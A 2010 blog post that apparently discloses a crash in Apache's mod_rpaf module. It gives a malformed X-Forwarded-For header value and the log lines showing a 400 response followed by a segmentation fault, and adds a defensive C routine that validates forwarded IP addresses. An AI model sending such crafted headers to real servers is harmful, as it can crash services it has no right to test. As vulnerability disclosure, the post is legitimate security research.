mod_rpaf vulnerability?
by d2 on Jun.14, 2010, under bug, info
rpaf is for backend Apache servers what mod_proxy_add_forward is for frontend Apache servers. It does exactly the opposite of mod_proxy_add_forward written by Ask Bjørn Hansen. It will also work with mod_proxy in Apache starting with release 1.3.25 and mod_proxy that is distributed with Apache2 from version 2.0.36.
It changes the remote address of the client visible to other Apache modules when two conditions are satisfied. First condition is that the remote client is actually a proxy that is defined in httpd.conf. Secondly if there is an incoming X-Forwarded-For header and the proxy is in its list of known proxies it takes the last IP from the incoming X-Forwarded-For header and changes the remote address of the client in the request structure. It also takes the incoming X-Host header and updates the virtualhost settings accordingly. For Apache2 mod_proxy it takes the X-Forwarded-Host header and updates the virtualhosts.
Latest version is 0.6
Pretty useful stuff if you use load balancers/proxies etc etc and you want to keep your Apache’s log format untouched. Right. Now what will happen if I choose to append/change/add x-forwarded-for header with some ‘malicious’ input like the one below?
x-forwarded-for: \’\”);|]*{
<
Apache 2.2.12 will report 400 bad request and then segfault one thread :)
# cat /var/log/apache2/access.log
IP.IP.IP.IP - - [14/Jun/2010:10:24:53 +0200] "GET / HTTP/1.1" 400 573 "referer: -" "-"
# cat /var/log/apache2/error.log
[Mon Jun 14 10:27:22 2010] [error] [client IP.IP.IP.IP] request failed: error reading the headers
[Mon Jun 14 10:27:31 2010] [notice] child pid 1877 exit signal Segmentation fault (11)
Is it exploitable? I don’t know for now.
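The rewrite rule from the module description above (peer is a known proxy, then take the last X-Forwarded-For element), written as standalone C with that element validated as an IP literal before it replaces the peer address. This is an added example, not mod_rpaf's code; the function name pick_client_ip and the sample addresses are hypothetical.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not mod_rpaf code). Writes the address to log into out.
 * Returns 1 if the forwarded address was used, 0 if the socket peer was kept,
 * -1 if out is too small for the peer address. */
int pick_client_ip(const char *peer, const char *xff,
                   const char *const *proxies, size_t nproxies,
                   char *out, size_t outlen)
{
    unsigned char addr[sizeof(struct in6_addr)];
    char tok[INET6_ADDRSTRLEN];
    const char *start, *end;
    size_t i, len;
    int trusted = 0;
    if (strlen(peer) >= outlen)
        return -1;
    strcpy(out, peer);                      /* default: keep the socket peer */
    for (i = 0; i < nproxies; i++)          /* condition 1: peer is a known proxy */
        trusted |= (strcmp(peer, proxies[i]) == 0);
    if (!trusted || xff == NULL)            /* condition 2: header is present */
        return 0;
    start = strrchr(xff, ',');              /* last element of the list */
    start = start ? start + 1 : xff;
    while (*start == ' ' || *start == '\t')
        start++;
    end = start + strlen(start);
    while (end > start && (end[-1] == ' ' || end[-1] == '\t'))
        end--;
    len = (size_t)(end - start);
    if (len == 0 || len >= sizeof(tok) || len >= outlen)
        return 0;                           /* empty or oversized element */
    memcpy(tok, start, len);
    tok[len] = '\0';
    if (inet_pton(AF_INET, tok, addr) != 1 && inet_pton(AF_INET6, tok, addr) != 1)
        return 0;                           /* not an IP literal: keep peer */
    memcpy(out, tok, len + 1);
    return 1;
}

int main(void)
{
    const char *const proxies[] = { "10.0.0.5" };   /* constructed sample values */
    char ip[INET6_ADDRSTRLEN];
    pick_client_ip("10.0.0.5", "198.51.100.7, 203.0.113.9", proxies, 1, ip, sizeof ip);
    printf("%s\n", ip);
    return 0;
}
```

Given a header value that is not an address, such as the first line of the one shown in the post, the function returns 0 and the logged address stays the proxy's own.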
November 22nd, 2010 on 17:41
nice post. thanks.